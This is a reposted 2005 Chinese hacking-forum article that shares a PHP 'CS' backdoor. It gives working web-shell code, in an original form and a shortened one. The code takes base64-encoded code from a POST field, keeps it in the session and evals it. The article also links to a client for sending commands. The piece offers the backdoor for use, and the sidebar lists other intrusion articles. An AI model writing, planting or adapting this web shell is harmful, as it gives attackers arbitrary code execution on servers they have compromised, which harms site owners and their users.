发表文章 返回首页

一段CS的php后门

时间:2005-03-14 17:35来源:中国网管联盟 作者:BitsCN整理 点击:
作者:浅蓝的辐射鱼 来源:http://www.77yan.com/ 和海阳的CS马一样,运行后会在主机“内存”里生成一个php后门。 只是我的客户端多加了点选项使得对方可以进行多个选择来生成自己需要的后门。 其实这些后门也是由偶来抉择的,其实很简单,你只要把php后门开头的?和结尾
   作者:浅蓝的辐射鱼  来源:http://www.77yan.com/

和海阳的CS马一样,运行后会在主机“内存”里生成一个php后门。
只是我的客户端多加了点选项使得对方可以进行多个选择来生成自己需要的后门。
其实这些后门也是由偶来抉择的,其实很简单,你只要把php后门开头的<?和结尾的?>去掉就可以了。
代码:
代码:

--------------------------------------------------------------------------------
 

<?PHP
session_start();
if(isset($_POST['code'])){
$_SESSION['theCode'] = trim($_POST['code']);
}
if(isset($_SESSION['theCode'])){
eval(base64_decode($_SESSION['theCode']));
}
?>
 

--------------------------------------------------------------------------------
 

lanker看了之后说代码是可以简化的。
改了后的代码:
代码:

--------------------------------------------------------------------------------
 

<?php
session_start();
isset($_POST['code']) && $_SESSION['theCode']=trim($_POST['code']); 54com.cn
isset($_SESSION['theCode']) && eval(base64_decode($_SESSION['theCode']));
?>
 

--------------------------------------------------------------------------------
 

呵呵,是少了点的样子,不过觉得其实也差不多的说~~if语句变这个样子了。
我实在比较懒,就不改了不改了。

客户端 http://www.77yan.com/clent.html


顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
最新评论 查看所有评论
发表评论 查看所有评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
表情:
用户名: 密码: 验证码:
发布者资料
admin 查看详细资料 发送留言 加为好友 用户等级:注册会员 注册时间:2008-05-08 23:05 最后登录:2009-01-05 00:01
推荐内容
  • 整理一些ROOTKIT的资料

    List: 一,前言 二,简介 三,rootkit的一些以公开的隐藏技术 四,一些隐藏技术的应对方...

  • 关于跨域蠕虫的存在

    这几天分析了几个大网站的XSSlt;iframe src=http://www.0×37.com/Project/csrf/do.as...

  • JSP+Oracle SQL Injection之旅

    SQL Injection可谓是长盛不衰的话题了,从ASP+MSSQL到PHP+MYSQL,一路走来也可谓是一...

  • 简述Radmin软件提权技巧

    最近做渗透测试时常碰到RADMIN一类的东西.. 一碰到此类的程序,一般我都会先看下对方把...

  • 简单认识Anti-RootKit

    在RK(rootkit)和ARK(anti-rootkit)的斗争已经进行了很久,在印象中最早出来的ARK工...

  • ASP数据库插马小议

    ASP数据库插马小议 By lake2 ( http://lake2.0x54.org ) 随着技术的发展,ASP数据库...